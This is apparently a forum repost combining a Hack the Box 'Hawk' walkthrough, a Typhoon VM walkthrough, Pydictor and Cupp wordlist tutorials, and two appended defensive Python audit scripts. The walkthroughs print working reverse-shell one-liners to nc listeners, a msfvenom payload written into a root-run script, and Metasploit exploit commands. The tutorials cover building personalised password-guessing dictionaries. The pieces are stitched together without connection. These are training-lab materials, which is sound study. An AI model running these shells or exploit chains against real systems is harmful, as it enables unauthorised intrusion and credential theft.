[Guide] How to Hack the Box: Hawk Walkthrough - NINZA - 05-14-2020

Today we are going to solve another CTF challenge “Hawk”. Hawk is a retired vulnerable lab presented by Hack the Box to help pentesters practice online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are available online, they have a static IP. The IP of Hawk is 10.10.10.102
Penetration Methodology:
  • Port scanning and IP discovery
  • Anonymous FTP Login
  • Checking file type
  • Getting Login Credentials
  • Browsing IP through port 80
  • Exploiting Drupal
  • Reading First Flag User.txt
  • Getting Login Credentials
  • Spawning TTY Shell
  • Searching exploit via Searchsploit
  • Getting root Access
  • Reading Final Flag Root.txt
Walkthrough
Let’s start off with our basic nmap command to find out the open ports and running services.
nmap -A 10.10.10.102
The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082 (h2 database http console).
From the NMAP Scan output, we saw that ftp Port 21 is Open and the next thing that catches our eyes is that it has Anonymous login allowed.
ftp 10.10.10.102
We easily connected to ftp through Anonymous Login. Moving on, after navigating through multiple directories we found a hidden file, i.e. “.drupal.txt.enc”, and then we transferred the file to our local machine.
Since .drupal.txt.enc is encrypted, let’s check the file type using the ‘file’ command.
file .drupal.txt.enc
It came out to be OpenSSL encoded data with a salted password. Clearly, we need to decrypt the file to get any further clue.
To crack this file, we have used an OpenSSL bruteforce tool which is easily available on GitHub. You can download it from the given below link or can run the following command for downloading and script execution.
git clone

[To see content please register here]

./openssl-brute --file /root/.drupal.txt.enc

Boom!! We have successfully cracked the file and the Password Hint we got is “PencilKeyboardScanner123” this could be the password for CMS Login. Let’s Check it.
As port 80 is running an http server, we opened the target machine’s IP address in our browser and found out it’s a Drupal Login Page. To log in to this page we have used a Basic Username: admin and Password: PencilKeyboardScanner123.
Oh yeah!! We have successfully logged into the admin dashboard. Now go to modules and then enable the checkbox for Path and PHP filter.
After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Just give any title for your malicious code.
Here we have written one-liner code for PHP reverse shell with the help of Pentest Monkey website.
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f"); ?>
Then select the Text format as “PHP code”. Before saving it you should start netcat listener on the listening port. So, once the code is executed it will establish a reverse connection.
nc -lvp 1234
We got a reverse connection of the victim’s machine on our netcat listener. To spawn the proper shell we have used python3 bin bash shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Inside /home/daniel we found the user.txt flag; now it is time to find the root flag. While exploring through directories, we thought of reading the contents of the “settings.php” file; in this file we found the password: drupal4hawk
cat settings.php | grep password
Then with the following command, we switched the user and logged in as user daniel.
su daniel
Password: drupal4hawk

Here we have used simple python3 commands to escape the python3 interpreter.
>>> import pty
>>> pty.spawn('/bin/bash')

From Nmap scan output we notice that “H2 database running on port 8082”, therefore we search out for H2 database exploit in searchsploit.
searchsploit H2 database
It came out to be a Remote Code Execution. The exploit we have used is highlighted, after that, we have copied the exploit 45506.py in the /root directory and run a Python server to download the file in the target machine.
searchsploit -m 45506
python -m SimpleHTTPServer 8080

Afterward, we downloaded our exploit 45506.py into the /tmp directory of the target machine. Then we granted full permission to the exploit and executed it using the following commands.
cd /tmp
wget

[To see content please register here]

chmod 777 45506.py
python3 45506.py -H 127.0.0.1:8082
id

Finally!! We have got the root access. Now let’s go and get the “root.txt”. We take a look at the content of the file and found our final flag.

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering, and DNS attacks. Prisma training involves the practical use of Typhoon.
Download it from here:

[To see content please register here]


Penetrating Methodology
  • Network Scanning (Netdiscover, Nmap)
  • 1st method of exploiting via exploring MongoDB
  • Consider robots.txt
  • Explore /MongoDB over browser
  • Identify credential
  • SSH Login
  • Find out kernel version
  • Kernel privilege escalation
  • Obtain root access
  • 2nd method of exploiting via tomcat manager (Metasploit)
  • Generating bash payload
  • Uploading bash payload
  • Obtain root access
  • 3rd Method: Exploiting Drupal CMS
  • 4th Method: Exploiting Lotus CMS
Since there are multiple ways in which we can exploit this machine, we have used two methods to capture the flag as follows:
Method 1:  Exploiting by exploring MongoDB
Let’s Begin with the Walkthrough!!
Let’s start off with scanning the network to find our target’s IP.
netdiscover
We found our target IP –> 192.168.1.101
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.101
The NMAP output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgresql), 8080(http).
Further, we notice that there is an entry /mongoadmin/ in robots.txt, which might be useful.
We also noticed that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. This could be another way of exploiting this machine, but we will see to it later on.
Moving on, since port 80 is also open, we browsed the found directory /mongoadmin/ in the browser. The result displayed is shown in the image. Here we change the database to credentials(84mb). It will display a link of 2 Credentials. Click on it.
Clicking on the 2 Credential link will give us Credentials [username]:typhoon and [password]:789456123 . These credentials might be a great help for further enumeration.
After some time, we just strike with an idea WHY NOT USE THE FOUND CREDS TO LOGIN WITH SSH?. Since SSH port 22 is also open.
Then we simply logged in SSH with CREDENTIALS Username: typhoon & Password: 789456123
ssh typhoon@192.168.1.101
Then we checked system information and found out Ubuntu 14.04 is running on the target machine. Good thing we were familiar with an exploit for Ubuntu 14.04.
Next, we look for an exploit for ubuntu 14.04 using searchsploit. The exploit we have used is highlighted; after that, we copied the exploit 37292.c into the /root/ directory and ran a Python server to download the file to the target machine.
searchsploit ubuntu 14.04
Afterward, we downloaded our exploit 37292.c into the /tmp directory. After compiling it and granting permissions to the exploit, we executed it.
cd /tmp
wget

[To see content please register here]

ls
gcc 37292.c -o rootshell
chmod 777 rootshell
./rootshell
cd /root
ls
cat root-flag

Booyah!! We have got the root access and found our FLAG. We take a look at the content of the file and are greeted with a congratulatory message.
Method 2: Exploiting via Tomcat Manager
Using Tomcat Manager Upload to get the meterpreter and then further establishing a reverse connection to get root access.
Let’s Begin with the Walkthrough!!
Since in Method-1 port scanning, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. So let’s browse the Target IP on port 8080 on the browser.
We are very familiar with Tomcat Server Login using manager web app due to our previous lab experiences. Without wasting time we straight away logged into Tomcat Server using Metasploit Tomcat Manager using the Default credentials for Tomcat Server Login.
[username]:tomcat
[password]:tomcat

Oh Yeah! We have got a meterpreter. After spending a lot of time on enumeration, we found a directory /tab which contains a file script.sh that is owned by root and has FULL Permission. So we thought of inserting malicious code in script.sh.
use exploit/multi/http/tomcat_mgr_upload
set rhost 192.168.1.101
set rport 8080
set httpusername tomcat
set httppassword tomcat
exploit

Moving on!! We need to create a bash code using Msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R
After that, append the above generated malicious code in the script.sh file.
echo "mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0</tmp/vvwjo | /bin/sh >/tmp/vvwjo 2>&1; rm /tmp/vvwjo" > script.sh
Since the malicious code got executed with the script.sh file, we got a reverse shell on our netcat listener.
Yeah!! We have got the root access and found root-flag. We take a look at the content of the file and are greeted with a congratulatory message.
Method 3: Exploiting Drupal CMS
Unfortunately, on exploring port 80 we didn’t observe any remarkable things, therefore, we try to enumerate web directory with the help of Dirb tool.
dirb

[To see content please register here]


It was wonderful to observe that there were two CMSs, as highlighted in the below image.
On exploring /Drupal in the web browser, it put up the following web page which was associated with Drupal cms.
Without wasting time, we chase towards Metasploit and run the following module to exploit Drupal cms.
use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit

Booom!! It was a terrific moment to see the meterpreter session of the target machine. Now for the post exploitation, you can follow the above methodology which we have already discussed in the 1st method.
Method 4: Exploiting Lotus CMS
Scroll up and kindly notice the result which we have obtained from the dirb scan; there we had found two CMSs. We had already exploited Drupal; now let’s go for the next CMS and try to exploit it, if possible.
So on exploring /cms in the web browser, it put up the following web page which was associated with Lotus cms.
Without wasting much time, again we chase towards Metasploit and run the following module to exploit lotus cms.
use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101
msf exploit(multi/http/lcms_php_exec) > set uri /cms/
msf exploit(multi/http/lcms_php_exec) > exploit

Great, we have owned another meterpreter session of the target machine. Now for the post-exploitation you can follow the above methodology which we have already discussed in the 1st method.

In this article, we will explore another dictionary building tool, “Pydictor”. These tools are always fun to work with, and this is another robust tool perfect for generating custom dictionaries. The thing that stands out most about this tool is the customization options it offers, from the most common to the advanced.
Table of Content
  • What is Pydictor
  • Installation
  • Numeric Dictionary
  • Lower Case Alphabet Dictionary
  • Upper Case Alphabet Dictionary
  • Numeral Coupled With Upper Case Alphabet
  • Upper Case Coupled With Lower Case Alphabet
  • Numeral Coupled With Lower Case Alphabet
  • Combining Upper Case, Lower Case, and Numeral
  • Adding Static Head
  • Adding Static Tail
  • Encoding
  • Character Permutation
  • Multiple Character Group Permutation
  • Social Engineering Dictionary
  • Customizing the Social Engineering Dictionary
  • Manipulating Dictionary Complexity Filter
  • Using Plugin
  • Leet Function
What is Pydictor
Pydictor is one of those tools that both novices and pros can appreciate. It is a dictionary building tool that is great to have in your arsenal when dealing with password strength tests. The tool offers a plethora of features which can be used to create that perfect dictionary for pretty much any kind of testing situation.
Installation
Let’s get cracking, the first thing we do is download Pydictor from GitHub and run it using Python. The moment the tool is executed, the running commands are visible to see other optional arguments.
git clone

[To see content please register here]

cd pydictor
python pydictor.py

Numeric Dictionary
We are beginning by exploring the option to create a numeric or as described by the tool, digital, dictionary. Let’s start by keeping it simple, only 5 characters long and limited to 0 – 5. We will be using the “-base” option to accomplish this.
The output is saved by default but in this case, we will be saving it to “dict.txt”. The storage location will always appear after each execution. The “cat” command is used to view the output in the terminal.
python pydictor.py --len 5 5 -base d -o dict.txt
Alphabet Dictionary
We will be making a dictionary which only holds lower case alphabets; the length of the words will remain at 5 characters.
python pydictor.py --len 5 5 -base L
Upper Case Alphabet Dictionary
We will now generate a dictionary with all the same metrics as earlier with the exception of changing the base option to upper case alphabets.
The result is visible to see.
python pydictor.py --len 5 5 -base c
Numeric Coupled With Upper Case Alphabet
The base options in Pydictor can be used in conjunction with each other; in this instance, we will be coupling numeric (d) and upper case alphabets (c). Let’s see what kind of output we get.
python pydictor.py --len 5 5 -base dc
Upper Case Coupled With Lower Case Alphabet
This time it’s going to be both upper and lower case alphabets together.
python pydictor.py --len 5 5 -base Lc
Numeral Coupled With Lower Case Alphabet
Let’s see what we get when we couple numerals with lower case alphabets.
python pydictor.py --len 5 5 -base dL
Combining Upper Case, Lower Case, and Numeral
Now let’s combine all the 3 options that we’ve been playing. We will now combine the upper case, lower case, and numeral. To keep the output moving quicker we will limit the word length to 3 characters.
python pydictor.py --len 3 3 -base dLc
Adding Static Head
We will now be adding a static head to all the words, note that the head is in addition to the 5 character length that is set. In this instance, we will be adding “raj” as a static head in front of all the numerals.
python pydictor.py --len 5 5 --head raj -base d
Adding Static Tail
We will now be adding a static tail to all the words, note that as mentioned in the instance above, the tail is in addition to the 5 character length that is set. In this instance, we will be adding “raj” as a static tail at the end of all the numerals.
python pydictor.py --len 5 5 --tail raj -base d
Encoding
Pydictor has an encode function that we can use to encode the words in the dictionary.
It gives us the option to choose from popular encoding algorithms such as Base64, DES, AES, MD5, SHA256, etc. In this instance, we will be using Base64 as our algorithm of choice to encode numerals.
In the interest of thoroughness, we will first generate the numerals without encoding and then with encoding.
python pydictor.py --len 5 5 -base d
Now we see what the Base64 encoded output looks like.
python pydictor.py --len 5 5 -base d --encode b64
Character Permutation
We can use a permutation of a single word, Pydictor lets us choose a word and churn out as many permutations of it as possible.
python pydictor.py -char raj
Multiple Character Group Permutation
We’ll take Pydictor’s permutation prowess one step further by using the “-chunk” option.
This time we will be giving it multiple groups of characters which it will take and churn out as many permutations as possible. It begins in a subtle way by just manipulating one word and then gradually moves on to the others. Notice the progression in the screenshot below.
python pydictor.py -chunk abc ABC 666 . _ @ "'"
Social Engineering Dictionary
Pydictor comes with an inbuilt social engineering dictionary builder that lets testers input information from profiling an individual to get a custom-tailored dictionary. We run the “help desk” within the social engineering dictionary builder option to see the various defaults it has to offer.
python pydictor.py --sedb
Customizing the Social Engineering Dictionary
“show option” is used within the social engineering dictionary builder to set the various vectors from profiling a target to generate a target-specific dictionary. In this instance, we will only be inputting the name, birth date, email and phone number. The vectors are set using the “set” command.
Let’s see what our social engineering dictionary output looks like.
Manipulating Dictionary Complexity Filter
We will be doing two things in this instance, we will be extending a dictionary based on a rule and separating words filtered according to complexity level. The complexity level is set to 3 by default, we will take it up a notch by setting it to 4. The character length is set to a minimum of 1 and a maximum of 6.
We view the latter part of the output.
python pydictor.py -extend raj --level 4 --len 1 6
Using Plugin
Pydictor has plugins built into it by default; we will be using a plugin that bases its generation on the last 6 digits of a Chinese resident ID card number. We will filter it using the “-occur” function. The occur option lets us define the following: letter, numeral, and special character, in that order. We will only be looking for results that have numerals occurring 4 times or more in a single string.
python pydictor.py -plug pid6 --types ">=0" ">=4" ">=0"
Leet Function
The leet function can selectively substitute numerals or special characters in the place of alphabets to illustrate; leet turns to L331. We will be using the leet function in conjunction with the occur option and extend function.
This is a more complex task that we have made from Pydictor than our earlier instances, let’s see what our output looks like.
python pydictor.py -extend /names.txt --leet 0 1 2 11 21 --len 4 16 --occur "<=10" ">0" "<=2"
We hope you enjoyed our little walkthrough of Pydictor. As mentioned earlier, dictionary generators are always a handy thing to have in your arsenal of pentesting tools. This tool gives the user a lot of advanced options which can be a bit overwhelming unless the user has a very clear picture of what they want out of this tool.
Don’t be afraid of taking Pydictor for a spin and see what more you can derive out of it.
Stay tuned for more articles on the latest and greatest in hacking.

Hello Friends!! Today we are going to explore the function of Cupp, which is an authoritative tool that creates a wordlist tailored to a particular person, which can be used while making a brute force attack for guessing login credentials.
Table of Content
  • Introduction to Cupp
  • How Cupp Works
  • Getting Started
  • Generating Custom Dictionary
  • Adding to Custom Dictionary
  • Downloading Dictionaries from Cupp Repository
  • Downloading Default Usernames and Passwords
  • Quiet Mode
Introduction to Cupp
Cupp stands for Common User Passwords Profiler, and this tool can be used in many circumstances like license penetration tests or forensic crime investigations. CUPP is cross-platform and written in Python, and its functioning is simple but with very powerful results. This application is a social engineer’s best friend when it comes to creating targeted password dictionaries which are tailored to an individual.
How Cupp Works
Cupp takes vectors from the profiling done for an individual, such as their nickname, pet’s name, child’s birthdate, etc. It works on the principle that a password is, more often, a combination of things known to an individual. These known things are often personal details that are very close to a person’s heart.
In cases when a person might use special notations in place of alphabets (e.g: leet can be written as 133t) Cupp has you covered.
Installation and Configuration
Cupp can be downloaded from GitHub using the “git clone” command. Within the downloaded Cupp folder, run the “cupp.py” file. Once the file is run, the program shows you the various options it has to offer.
git clone

[To see content please register here]

cd cupp
ls
./cupp.py

Optional Arguments:
-i      Interactive questions for user password profiling
-w FILENAME      Use this option to profile an existing dictionary
-l      Download huge wordlists from a repository
-a      Parse default usernames and passwords directly from Alecto DB. Project Alecto uses purified databases of Phenoelit and CIRT which were merged and enhanced.
-v      Version of the program
Generating Custom Dictionary
Now it’s time to have some fun!
We will be using the interactive option to generate the custom dictionary. You will see that we have the option to input details such as pet’s name, child’s name, partner’s nickname, etc. All these things are highly personal, and it is very common to find them in a password, one way or another.
There’s also an option to add any specific keywords, special characters, and random numbers. Apart from all this, there’s the option to activate Leet mode, this will make the generated dictionary extremely effective.
That’s all, the dictionary now gets made and saved.
./cupp.py -i
Adding to Custom Dictionary
Cupp gives us the option to add more words to our created dictionary. We can customize the kind of words we would like to add by using the provided options.
./cupp.py -w raj.txt
Now that we have successfully executed the command, let’s traverse to the location to check whether the output has been saved in the file or not. In this case, our location for output is /root/cupp/raj.txt.cupp.txt
Downloading Dictionaries from Cupp Repository
Cupp has its own repositories of dictionaries which are pre-classified. These dictionaries can be downloaded and used. The downloaded files are compressed and have to be uncompressed to be viewed.
Enter the number to choose a name to select the dictionary you want to download, we have pressed 16 and downloaded to view a dictionary of Hindi names.
./cupp.py -l
cd dictionaries
cd hindi
gzip -d hindu-names.gz
cat hindu-names

Downloading Default Usernames and Passwords
Cupp can download premade dictionaries holding the most common usernames and passwords from the project Alecto database for usage.
./cupp.py -a
ls
cat alectodb-passwords.txt

Quiet Mode
Quiet mode is for running Cupp in a more hush-hush way. If you’re the kind of person who does not want a big banner on their screen showing everyone what you’re doing, you’ll like this option. This basically makes for a cleaner screen while cupp is carrying out the commands you’re giving it, without the funny cow popping up on top.
We’re going to couple the quiet mode option with the dictionary download option that we demonstrated above.
./cupp.py -a -q
We hope you enjoyed this basic walkthrough of the Cupp application. It is very handy and easy to use the tool when it comes to making custom dictionaries. Go ahead and see if it can guess your password.
Stay tuned for more articles on the latest and greatest in hacking!!!
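The Cupp and Pydictor sections above build wordlists from a person's profile (names, pet names, birth dates), leet substitutions and numeric heads or tails. As an added example that is not part of the original post or of either tool, the check below rejects a candidate password at set-time when its letters come almost entirely from such profile data; the profile fields, the leet map and the `max_unknown` threshold are assumptions chosen for illustration.

```python
import re
from itertools import permutations

# Assumed leet reversals for this example; "1" is tried as both "i" and "l".
_LEET_COMMON = {"0": "o", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"}
LEET_I = str.maketrans({**_LEET_COMMON, "1": "i"})
LEET_L = str.maketrans({**_LEET_COMMON, "1": "l"})


def profile_tokens(profile):
    """Lowercase tokens a profile-based wordlist generator would start from."""
    tokens = set()
    for value in profile.values():
        parts = [p.lower() for p in re.split(r"[^0-9A-Za-z]+", str(value)) if p]
        tokens.update(p for p in parts if len(p) >= 3)
        # A date such as 1990-07-14 is also tried as ddmm, mmyy, ddmmyyyy, ...
        if len(parts) == 3 and all(p.isdigit() for p in parts):
            for group in (parts, [p[-2:] for p in parts]):
                for n in (2, 3):
                    tokens.update("".join(c) for c in permutations(group, n))
    return tokens


def derived_from_profile(password, profile, max_unknown=3):
    """Return the sorted profile tokens that explain the password, or []."""
    # Longest tokens first so "19900714" is consumed before "1990".
    tokens = sorted(profile_tokens(profile), key=lambda t: (-len(t), t))
    lowered = password.lower()
    for variant in (lowered, lowered.translate(LEET_I), lowered.translate(LEET_L)):
        residue, matched = variant, []
        for tok in tokens:
            if tok in residue:
                residue = residue.replace(tok, "")
                matched.append(tok)
        # Leftover digits and symbols count as padding: generators enumerate
        # numeric heads and tails cheaply, so only unexplained letters count.
        unknown_letters = re.sub(r"[^a-z]", "", residue)
        if matched and len(unknown_letters) <= max_unknown:
            return sorted(matched)
    return []


# Constructed sample profile (not data from the page).
SAMPLE_PROFILE = {"name": "Raj Sharma", "pet": "Simba", "birthdate": "1990-07-14"}

if __name__ == "__main__":
    for candidate in ("Raj1990", "S1mb4!2020", "Sharma140790",
                      "trajectory-planner", "correct-horse-battery"):
        hits = derived_from_profile(candidate, SAMPLE_PROFILE)
        print(f"{candidate!r}: {'REJECT ' + str(hits) if hits else 'ok'}")
```

A password that merely contains a short profile token by coincidence ("trajectory-planner" contains "raj") passes, because most of its letters are not explained by the profile.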
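Method 2 of the Typhoon walkthrough above depends on two host misconfigurations: Tomcat manager credentials left at a default, and a root-owned script.sh with full permissions. As an added example that is not part of the original post, the audit below flags both; the role set, the short default-password list and the sample tomcat-users.xml content are assumptions constructed for illustration.

```python
import os
import stat
import xml.etree.ElementTree as ET

# Roles that allow deploying applications through the Tomcat manager app.
DEPLOY_ROLES = {"manager", "manager-gui", "manager-script"}
# Constructed short list of well-known defaults; extend for your environment.
DEFAULT_PASSWORDS = {"", "tomcat", "admin", "password", "s3cret"}


def audit_tomcat_users(xml_text):
    """Return (username, reason) for deploy-capable accounts with weak passwords."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        # Newer tomcat-users.xml files carry an XML namespace; compare local names.
        if elem.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if not roles & DEPLOY_ROLES:
            continue
        if password.lower() == name.lower():
            findings.append((name, "password equals username"))
        elif password.lower() in DEFAULT_PASSWORDS:
            findings.append((name, "well-known default password"))
    return findings


def writable_by_others(top, owner_uid=0):
    """List regular files under `top` owned by `owner_uid` that any user can modify."""
    hits = []
    for dirpath, _dirs, files in os.walk(top):
        for filename in files:
            path = os.path.join(dirpath, filename)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if (stat.S_ISREG(st.st_mode) and st.st_uid == owner_uid
                    and st.st_mode & stat.S_IWOTH):
                hits.append(path)
    return sorted(hits)


# Constructed samples: the weak setting beside a corrected one.
SAMPLE_WEAK = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="monitor" password="tomcat" roles="manager-status"/>
</tomcat-users>"""
SAMPLE_FIXED = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <user username="deployer" password="Zq7-constructed-long-random-value"
        roles="manager-script"/>
</tomcat-users>"""

if __name__ == "__main__":
    import sys
    print("weak sample :", audit_tomcat_users(SAMPLE_WEAK))
    print("fixed sample:", audit_tomcat_users(SAMPLE_FIXED))
    # Optional: pass directories to scan for root-owned, world-writable files.
    for directory in sys.argv[1:]:
        for path in writable_by_others(directory):
            print("root-owned and world-writable:", path)
```

Any root-owned file this reports that is also run by a scheduled job or service lets an unprivileged account execute commands as root, which is the condition the walkthrough relied on.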